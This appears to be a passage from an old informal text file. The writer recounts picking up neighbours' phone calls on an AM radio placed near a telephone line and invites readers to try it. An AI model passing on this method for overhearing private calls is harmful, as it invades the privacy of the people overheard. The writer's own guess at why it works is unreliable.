|||
|
while everyone else was making enough noise to wake the dead. So, I
|
|||
|
thought, I'll put personal stereo radio onto some radio crackle to cut out
|
|||
|
everything else. I was happily reading for a while when suddenly the radio
|
|||
|
crackle was interrupted by 'ring ring, ring ring, 'ello Jon, going into
|
|||
|
work tomorrow ? Good, how's the wife.... etc etc' Fuck me ! A telephone
|
|||
|
conversation. After a bit of investigating I discovered my bed lies next
|
|||
|
to where the telephone line goes thru the wall.
|
|||
|
|
|||
|
What I did was to tune the radio into an AM frequency, as far to
|
|||
|
the right (past 1600 kHz) as possible. This works on my personal stereo, a
|
|||
|
Sharp, model JC-512(GY), my clock radio and my mates pocket radio, but not
|
|||
|
on some other radios we've tried. It picks up local telephone calls (if
|
|||
|
there are any strong enough to be picked up) when the radio is put near a
|
|||
|
telephone socket or line (the closer the better). Computer monitors and
|
|||
|
TV's give loads of interference (try putting your the radio near one when
|
|||
|
tuned to listen for phones) so keep away from them.
|
|||
|
|
|||
|
You can't choose what calls to listen in on, and some may be
|
|||
|
blurred beyond recognition, while others are crystal clear. Also,
|
|||
|
strangely enough if someone in the house uses the phone while your
|
|||
|
listening to conversations it doesn't effect it in any way, and you can't
|
|||
|
hear the call currently on the line.
|
|||
|
|
|||
|
Not being an electronics hacker I can only assume it is to do with
|
|||
|
the frequency of radio waves given off by electrical devices after a
|
|||
|
certain distance travelled. But then again maybe not.
|
|||
|
|
|||
|
This may work in other places apart from the UK as well, give it a
|
|||
|
try !
|